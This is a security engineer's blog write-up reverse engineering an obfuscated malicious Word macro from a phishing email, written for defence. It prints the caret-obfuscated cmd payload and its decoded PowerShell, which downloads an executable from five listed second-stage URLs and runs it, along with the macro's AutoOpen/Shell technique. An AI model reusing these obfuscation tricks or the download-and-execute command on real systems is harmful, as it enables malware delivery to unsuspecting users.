Reverse Engineering an Obfuscated Malicious Macro

Spencer Dodd
Jan 8 · 10 min read

Malicious Microsoft Office documents have been a staple of commercial cybersecurity threat actors for some time. The ubiquity of Office in corporate workplaces, combined with the effectiveness of phishing and spearphishing, makes this technique’s attack surface quite large. Identifying and deconstructing these attacks gives us insight into offensive capabilities as well as effective defensive strategies.

Recently, one of our users received an email with an attachment that didn’t seem quite right.

Just mildly edited

Luckily it attracted our attention, and I took a look at the attachment in question. It was a Microsoft Word document and, after some inspection, it became clear that it contained a malicious macro. These macros are Visual Basic for Applications (VBA) code snippets designed to perform code execution on the target’s machine. This attack can be triggered if you click through the security warning that pops up in Word when you open a document with macros.

Please don’t

You’ve never done this, right?…right?…Of course you haven’t, but people do, and when a phish is successful we have to work out what the payload was in order to tailor any remediation efforts.

Usually, these documents contain code that is obfuscated in order to mask its true purpose and make static analysis a difficult process. There are a variety of tools and techniques that can help you figure out the intent of a malicious document ranging from static code analysis to observation in a detonation sandbox. In the interest of making things difficult and maybe learning a thing or two along the way, I reverse engineered this document’s payload by hand to determine its functionality.

Obtaining Macro Source Code

I used the awesome tool olevba, part of the oletools project, which lets you extract VBA macro source code directly from the malicious file on a *nix system using Python. Alternatively, you could open the macros manually in Word or LibreOffice without enabling execution. I extracted the streams from the malicious document using the following command:

$ python2 oletools/olevba.py Invoice_No_2804552.doc -c

The -c flag gives us just the source code of the macros without any further analysis.

Not exactly the most legible code I’ve ever seen. All of this obfuscation alone can be an indication of malicious intent. Now we get to figure out what it all does.

VBA NOP-fuscation

The first step in figuring out what is actually happening here is removing the no-operations (nops). There are a fair number of them included to obscure the actual functional pieces of code. In VBA, a variable that is never declared or assigned is a Variant holding Empty, which behaves as 0 or an empty string depending on the context. Code like the following example will pop calc.exe.

The conditional above the Shell call will not error out even though WsGQFM is not defined anywhere, but will instead be interpreted as the following statement:

If Empty Or 2 Then
tBFjh = "TI"
End If

Which will set the new variable tBFjh to the string “TI”. All of these snippets are included simply to make static analysis of the macro more confusing. The included conditional statements either do not execute, or execute and assign a random string to a random variable that is not referenced again. Here is a simplified version of the malicious source code without those nops:

Identifying that technique alone removes a lot of the noise in this payload. Now, while it’s still not totally clear what is going on, we’re getting a semblance of structure. It looks to me like the middle two functions, DTqpj and vNtBMCjurWl, contain both normal and reversed strings that are concatenated and returned. The bottom function, SjonJLuoL, appears to take in a variable and make a call to Shell with that value. However, the AutoOpen logic is still a bit confusing.

Sub AutoOpen() 
SjonJLuoL (KeyString(wwTLriZs + lfKnf + 10 + 7 + 50 + CdBUtfI + iNPLT) + LkwPL + qNIXIW + KeyString(BdpGivaC + ufzLc + 12 + 8 + 57 + tXzCjRS + KGlIA) + DTqpj + vNtBMCjurWl + fWWSlvV + azJobQRV)
End Sub

This obfuscation again builds off of VBA’s interpretation of uninitialized variables. The only important pieces here are the KeyString calls, the integers, and the two random-looking names that are actually defined functions in the code (DTqpj and vNtBMCjurWl). After removing these undefined nops, we get:

Aha! So our AutoOpen passes the value of:

KeyString(67) + KeyString(77) + DTqpj + vNtBMCjurWl

to our executing function SjonJLuoL. So, what does KeyString do? Well, according to Microsoft’s Word VBA API documentation, it:

Returns the key combination string for the specified keys (for example, CTRL+SHIFT+A).

So basically, it is going to translate a given character code to its string representation. In this case, we get C and M.
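The arithmetic behind that step can be checked with a short Python sketch. It assumes, as described above, that every undefined name contributes 0 in a numeric context, and it uses Python's chr() as a stand-in for KeyString, which is only a fair approximation for plain letter key codes like these. The function name resolve_key_code is hypothetical.

```python
import re


def resolve_key_code(expression, defined=None):
    """Sum a '+'-joined VBA argument list, counting undefined names as 0."""
    defined = defined or {}
    total = 0
    for term in expression.split("+"):
        term = term.strip()
        if re.fullmatch(r"\d+", term):
            total += int(term)             # integer literal
        else:
            total += defined.get(term, 0)  # undefined variable behaves like 0
    return total


first = resolve_key_code("wwTLriZs + lfKnf + 10 + 7 + 50 + CdBUtfI + iNPLT")
second = resolve_key_code("BdpGivaC + ufzLc + 12 + 8 + 57 + tXzCjRS + KGlIA")

# chr() stands in for KeyString here (an assumption, valid for simple letter codes)
print(first, chr(first))
print(second, chr(second))
```

Only the integer literals survive the sum, which is why the random-looking names around them can be deleted without changing the result.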

I’ve renamed functions and variables of the full remaining macro to more accurate purposeful descriptions below:

Now we have quite a bit of structure and the execution flow is clear. Our AutoOpen calls our Execute function with the concatenated payload. However, we don’t know what the purpose of QrQBzLuD is. It has a value of 0 and is passed along with our command string as a second argument to Shell. Again we turn to the Microsoft VBA documentation. The Shell call is defined as follows:

Shell( pathname, [ windowstyle ] )

The optional windowstyle argument is explained as follows:

Optional. Variant (Integer) corresponding to the style of the window in which the program is to be run.

And looking at the options, we see that a given value of 0 means:

vbHide (0): Window is hidden and focus is passed to the hidden window.

So our command execution will be performed in a hidden window, unbeknownst to the user who so unceremoniously enabled macros. Our final VBA payload, fully de-obfuscated, looks like so:

Command Line Payload

Now we’ve arrived at the native Windows shell command execution portion of this payload.

CMd /V^:^ON/C"^s^e^t lN=^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^}^}^{^hc^t^ac^}^;^k^a^er^b^;^ir^j^$^ ^m^etI^-^e^k^ovn^I;)^ir^j^$^ ^,^fB^J^$(^e^l^i^F^d^a^o^ln^wo^D^.^i^w^Y^$^{^yr^t^{)^B^Kj^$ n^i^ ^f^B^J^$(^hc^a^er^o^f;^'^e^x^e^.^'^+^U^t^L^$^+^'^\'+c^i^l^b^u^p^:vne^$^=^ir^j^$^;^'^4^9^3^'^ ^=^ ^U^t^L^$^;)^'^@^'(^t^i^l^p^S^.^'^Q/^ur^.^en^g^i^s^e^dn^a^l^.n^a^m^i^d^.^w^w^w//^:^p^t^t^h@yn/^t^i^.e^l^o^ic^s^iv^e^l^l^ed^on^i^dra^i^g^l^i//^:^p^t^t^h^@^g/^k^u.^oc^.^s^ec^ivr^e^s^k^e^p^sn^i//^:^p^t^t^h^@C/^m^oc^.^l^a^g^o^f^j//^:^p^t^t^h@^XC^s^U/^e^b^.^yn^a^j//^:^p^t^t^h^'^=^B^K^j^$^;^tn^e^i^lC^b^e^W^.^t^eN^ ^tc^e^j^b^o^-^w^en^=^i^w^Y^$^ ^l^l^e^h^sr^e^w^o^p&&^f^or /^L %^p ^in (^3^4^9^;^-^1^;^0)^d^o ^s^e^t ^l^I=!^l^I!!lN:~%^p,1!&&^i^f %^p ^e^q^u ^0 c^a^l^l %^l^I:^~^-^3^5^0%"

To start de-obfuscating this payload we do a little research. I had a hunch that the caret characters were escape characters that would not impact the plaintext they interspersed. According to a quick search, that assumption held true!

The ^ symbol (also called caret or circumflex) is an escape character in Batch script. When it is used, the next character is interpreted as an ordinary character.

So that’s all more nop obfuscation. We can safely remove the carets and not affect the payload. So here we have our payload again, a little closer to plaintext:

CMd /V:ON/C"set lN= }}{hctac};kaerb;irj$ metI-ekovnI;)irj$ ,fBJ$(eliFdaolnwoD.iwY${yrt{)BKj$ ni fBJ$(hcaerof;'exe.'+UtL$+'\'+cilbup:vne$=irj$;'493' = UtL$;)'@'(tilpS.'Q/ur.engisednal.namid.www//:ptth@yn/ti.eloicsivelledonidraigli//:ptth@g/ku.oc.secivreskepsni//:ptth@C/moc.lagofj//:ptth@XCsU/eb.ynaj//:ptth'=BKj$;tneilCbeW.teN tcejbo-wen=iwY$ llehsrewop&&for /L %p in (349;-1;0)do set lI=!lI!!lN:~%p,1!&&if %p equ 0 call %lI:~-350%"
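The caret stripping that produced the string above is easy to script. The following Python sketch is a simplified model: it treats every caret as an escape for the character after it and ignores the quoting rules a real cmd parser applies. The function name strip_carets is hypothetical.

```python
import re


def strip_carets(command):
    """Drop each escaping caret and keep the character it escapes."""
    # "^x" becomes "x"; a doubled "^^" therefore collapses to one literal caret.
    return re.sub(r"\^(.)", r"\1", command)


# A short excerpt from the start of the obfuscated payload
sample = "^s^e^t lN=^}^}^{^hc^t^ac"
print(strip_carets(sample))
```

Using a regular expression rather than a plain replace keeps an intentionally escaped caret intact, which matters if a payload ever relies on one.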

At first glance we can see command flags, some variables being set, confusing squigglies, and llehsrewop (string reversing, anyone?). I broke this out into the independent functional steps of the payload so it would be a little more readable.

CMd /V:ON/C
set lN= }}{hctac};kaerb;irj$ metI-ekovnI;)irj$ ,fBJ$(eliFdaolnwoD.iwY${yrt{)BKj$ ni fBJ$(hcaerof;'exe.'+UtL$+'\'+cilbup:vne$=irj$;'493' = UtL$;)'@'(tilpS.'Q/ur.engisednal.namid.www//:ptth@yn/ti.eloicsivelledonidraigli//:ptth@g/ku.oc.secivreskepsni//:ptth@C/moc.lagofj//:ptth@XCsU/eb.ynaj//:ptth'=BKj$;tneilCbeW.teN tcejbo-wen=iwY$ llehsrewop &&
for /L %p in (349;-1;0)
do set lI=!lI!!lN:~%p,1! &&
if %p equ 0
call %lI:~-350%

Here we can see some structure that will allow us to break the payload down line by line.

CMd /V:ON/C

To understand this, we look up the meanings of the two flags:

/V:ON Enable delayed environment variable expansion
this allows a FOR loop to specify !variable! instead of %variable%
expanding the variable at execution time instead of at input time.

If /C or /K is specified, then the remainder of the command line is processed as an immediate command in the new shell. Multiple commands separated by the command separator ‘&’ or ‘&&’ are accepted if surrounded by quotes.

So the /V:ON flag lets variables be re-expanded each time a line runs, which the payload needs in order to build up a string inside a loop, and the /C flag allows us to wrap our multi-step payload in quotes and execute each step delimited by & or &&. Cool. Let’s look at each step of the payload as delimited by &&. Here is the first step of the payload:

set lN= }}{hctac};kaerb;irj$ metI-ekovnI;)irj$ ,fBJ$(eliFdaolnwoD.iwY${yrt{)BKj$ ni fBJ$(hcaerof;'exe.'+UtL$+'\'+cilbup:vne$=irj$;'493' = UtL$;)'@'(tilpS.'Q/ur.engisednal.namid.www//:ptth@yn/ti.eloicsivelledonidraigli//:ptth@g/ku.oc.secivreskepsni//:ptth@C/moc.lagofj//:ptth@XCsU/eb.ynaj//:ptth'=BKj$;tneilCbeW.teN tcejbo-wen=iwY$ llehsrewop

This assigns the variable lN the value of this large reversed string, which appears to be PowerShell and to involve some URLs.

for /L %p in (349;-1;0)

FOR /L — Loop through a range of numbers

This for loop runs through integers 349 to 0, stepping backwards each iteration.

do set lI=!lI!!lN:~%p,1!

This step looks confusing to someone who doesn’t do any batch coding, but it is easier to read if you separate it a little like this:

do set lI = !lI! !lN:~%p,1!

This is where the /V:ON flag comes in handy, as it allows us to perform variable expansion each time the line is reached as opposed to a single time when the command is called.

Variable expansion means replace a variable enclosed in % or ! by its value.
The %normal% expansion happen just once, before a line is executed. This means that a %variable% expansion have the same value no matters if the line is executed several times (like in a for command). The !delayed! expansion is performed each time that the line is executed.
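To see why the timing matters for this payload, here is a rough Python model of the two expansion modes. It is a simplification and not how cmd is implemented: with normal expansion the accumulator is read once before the loop starts, while with delayed expansion it is read again on every pass. The function name build_string is hypothetical.

```python
def build_string(source, delayed):
    """Model `set lI=<lI><source[p]>` run for p = len-1 down to 0."""
    env = {"lI": ""}
    frozen = env["lI"]  # what %lI% would be replaced with when the line is parsed
    for p in range(len(source) - 1, -1, -1):
        current = env["lI"] if delayed else frozen
        env["lI"] = current + source[p]
    return env["lI"]


print(build_string("llehs", delayed=True))   # accumulator grows on each pass
print(build_string("llehs", delayed=False))  # accumulator is overwritten each pass
```

With delayed expansion the loop accumulates the whole reversed string. Without it, each pass starts again from the empty value captured at parse time, so only the final character survives.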

In this line, lI is set to the current value of lI plus the one-character substring of lN at index %p. Or, more simply, in a Pythonic representation:

lI = ""
for p in range(349, -1, -1):
    lI = lI + lN[p]

So in this case, lI is going to be the properly formatted string, and we are iterating through lN and putting its characters in reverse order into lI.

if %p equ 0
call %lI:~-350%

Then, if we’ve finished reversing the string, we call the last 350 characters of the newly reversed string lI as a shell command. After running through the loop, the variable lI will contain the following string:

powershell $Ywi=new-object Net.WebClient;$jKB='http://jany.be/UsCX@http://jfogal.com/C@http://inspekservices.co.uk/g@http://ilgiardinodellevisciole.it/ny@http://www.diman.landesigne.ru/Q'.Split('@');$LtU = '394';$jri=$env:public+'\'+$LtU+'.exe';foreach($JBf in $jKB){try{$Ywi.DownloadFile($JBf, $jri);Invoke-Item $jri;break;}catch{}}

which is then executed.
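The whole reversal stage can be replayed safely outside of cmd. The Python sketch below mirrors the three batch constructs on a short excerpt of lN rather than the full string. It relies on Python slicing returning an empty string for an out-of-range index, which I am assuming is close enough to the batch substring behaviour for this purpose. The function name run_reversal is hypothetical.

```python
def run_reversal(lN, start=349, tail=350):
    """Replay the for /L loop and the final substring taken by `call`."""
    lI = ""
    for p in range(start, -1, -1):  # for /L %p in (349;-1;0)
        lI += lN[p:p + 1]           # !lN:~%p,1! (empty when p is past the end)
    return lI[-tail:]               # %lI:~-350%


# Excerpt taken from the end of the reversed string in the payload
excerpt = "tneilCbeW.teN tcejbo-wen=iwY$ llehsrewop"
command = run_reversal(excerpt)
print(command)
```

For a string this simple, excerpt[::-1] gives the same answer in one step. The loop form is only useful for confirming that the batch logic does nothing beyond a plain reversal.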

PowerShell Payload

Now you must be thinking what I’m thinking at this point, which is

are we done yet??

The answer is: yeah, pretty much. Here is this payload formatted a little more nicely for the eyes:

So we loop through the @-delimited URIs, attempting to download a file from each. When a download from one of the paths succeeds, we write it to $env:public+'\'+$LtU+'.exe' (that is, 394.exe in the public user folder), execute it, and break out of the loop. Here is the final payload most simply:

Postmortem

We officially made it from executable gibberish to block-able second-stage domains! While this was fun and a great learning experience, it is not the most efficient way to get this information. In the time it took to reverse this payload, the second-stage domains were already dead. A good dynamic analysis sandbox is the way to go for these, as it can get you the macro contents along with the raw payload executed and sometimes relevant second-stage payload heuristics.
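Turning the recovered URL list into something a blocklist can consume takes only a few lines. This Python sketch splits the @-delimited string from the PowerShell command and pulls out the hostnames. The defanged output format and the function names are my own choices, not part of the original analysis.

```python
from urllib.parse import urlsplit

# The @-delimited URL string recovered from the PowerShell payload
url_blob = ("http://jany.be/UsCX@http://jfogal.com/C@"
            "http://inspekservices.co.uk/g@"
            "http://ilgiardinodellevisciole.it/ny@"
            "http://www.diman.landesigne.ru/Q")


def second_stage_hosts(blob, delimiter="@"):
    """Return the unique hostnames in the order they appear."""
    hosts = []
    for url in blob.split(delimiter):
        host = urlsplit(url).hostname
        if host and host not in hosts:
            hosts.append(host)
    return hosts


def defang(host):
    """Make a hostname non-clickable for reports and tickets."""
    return host.replace(".", "[.]")


hosts = second_stage_hosts(url_blob)
for host in hosts:
    print(defang(host))
```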

Given that we know the document is malicious and doesn’t contain any sensitive company information, we can upload the document to VirusTotal. VirusTotal does a number of cool things, including running samples through an array of antivirus detection engines and reporting static and sometimes heuristic data on the samples. In the case of malicious documents, it can also extract the VBA macro streams. Be aware, though, that once a document is uploaded to VirusTotal, the information in it should be considered public. So before uploading a suspicious company document, analyze it locally with tools like oletools to make sure it contains nothing sensitive.

The VirusTotal results for the dissected sample (9d0e185ad2ed2ee4cd332294a17b534987b969c44931b49cdbcbfc329ea63f22) can be found here. At this point, it has pretty good detection:

Definitely enable macros

Additionally, if you go to the Behavior tab and select Tencent’s sandbox, you can see that it has done a pretty nice job of capturing the commands executed on the system.

While the commands are truncated in this output, we can see most of our PowerShell command and all the relevant domains to be blocked. It also caught the exe that was dropped to disk.

Sandboxes can save a lot of time! I don’t believe this sandbox analysis is performed for every sample uploaded to VT, but if you want you can build your own malware analysis sandbox. Cuckoo Sandbox is a free open-source way to get started.

I hope you enjoyed this write-up. If you thought this was interesting and want to join a team that works on building and securing modern eCommerce infrastructure, check out our open security roles here!


Spencer Dodd - Walmart Information Security
spencer.dodd@jet.com
link to my github

Acknowledgments

Harold Ogden of the Dynamic Defense Engineering Team at Walmart, Eric Goldman of Jet Security, Walmart Information Security, and Jet Information Security

Thanks to James Novino

